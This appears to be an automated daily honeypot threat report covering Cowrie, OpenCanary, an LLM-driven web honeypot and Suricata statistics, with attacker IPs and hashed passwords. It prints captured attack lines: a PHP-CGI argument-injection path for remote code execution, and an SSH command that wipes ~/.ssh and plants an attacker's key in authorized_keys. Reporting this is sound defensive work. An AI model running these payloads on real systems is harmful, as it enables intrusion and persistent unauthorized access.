Monday, 8 June 2026 πŸ’€ critical

Daily Threat Report

433 SSH Connections
320 Login Attempts
791 Commands Run
53 SSH Unique IPs
680 Protocol Events
41 Protocol IPs
75 Web Hits
28 Web Service IPs

Top Attacker IPs

  1. 🌐 176.65.139.41 BGPβ†—
  2. 🌐 116.99.171.179 BGPβ†—
  3. 🌐 176.65.139.174 BGPβ†—
  4. 🌐 14.1.107.170 BGPβ†—
  5. 🌐 123.10.237.89 BGPβ†—

Top Passwords Tried

  1. 91566946b1d8deb0
  2. aad3f9ba1d6740cc
  3. 6b86b273ff34fce1
  4. 08fb832e6bca8d07
  5. 8d969eef6ecad3c2

🌐 WEB HONEYPOT β€” HoneyAI HTTP

AI-generated fake HTTP responses served to 75 scanner requests from 28 unique IPs (local, offline).

Top Paths Probed

  1. /
  2. /SDK/webLanguage
  3. /login
  4. /zc?action=getInfo
  5. /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input

Top User-Agents

  1. Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
  2. Mozilla/5.0
  3. node
  4. Go-http-client/1.1
  5. Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
# Automatic multi-platform threat intel reporting
$ honeypot-report.sh --since 24h
β†’ 941 IPs β†’ AbuseIPDB  (community confidence scores updated)
β†’ 941 IPs β†’ AlienVault OTX  (pulse indicators added)
β†’ 941 IPs β†’ Blocklist.de  (auto-ban list updated)
β†’ 941 IPs β†’ DShield/SANS  (global threat feed updated)

🀣 ATTACKER COMEDY CORNER

Real attempts. No actors were harmed in the making of this honeypot.

πŸ”‘ Hall of Shame β€” Passwords

91566946b1d8deb0
aad3f9ba1d6740cc
6b86b273ff34fce1
08fb832e6bca8d07
8d969eef6ecad3c2

πŸ’» Commands They Tried

uname -s
cd ~ && rm -rf .ssh && mkdir .ssh && echo $_dqssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr$_dq>>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
uname -m
whoami
uname -a

These are real credentials and commands attempted by automated scanners and script kiddies. Logged, reported, and immortalized.

Automated report for 8 de June de 2026. Recorded 433 SSH connections on the Cowrie honeypot and 680 multi-protocol events on OpenCanary, from 94 unique IPs. 941 IPs were automatically reported to the AbuseIPDB community database.

SSH Activity (Cowrie)

The SSH honeypot received 320 login attempts from 53 unique IPs. Attackers executed 791 commands after gaining simulated system access.

Multi-Protocol Activity (OpenCanary)

Detected 680 events across services including FTP, Telnet, MySQL, Redis, VNC and Git from 41 distinct IPs. All events are access attempts against simulated production services.

HTTP Web Honeypot (Galah LLM)

The web honeypot received 75 HTTP requests from real scanners across 28 unique IPs. Each attacker received a fake response generated in real time by the local AI model qwen2.5:0.5b (Ollama, no internet connection required).

Network IDS (Suricata)

The network intrusion detection system generated 19190 alerts from 563 unique source IPs. Suricata monitors all traffic on the primary network interface using Emerging Threats + AlienVault OTX rulesets.

← All Reports πŸ›‘οΈ Subscribe to blocklists β†’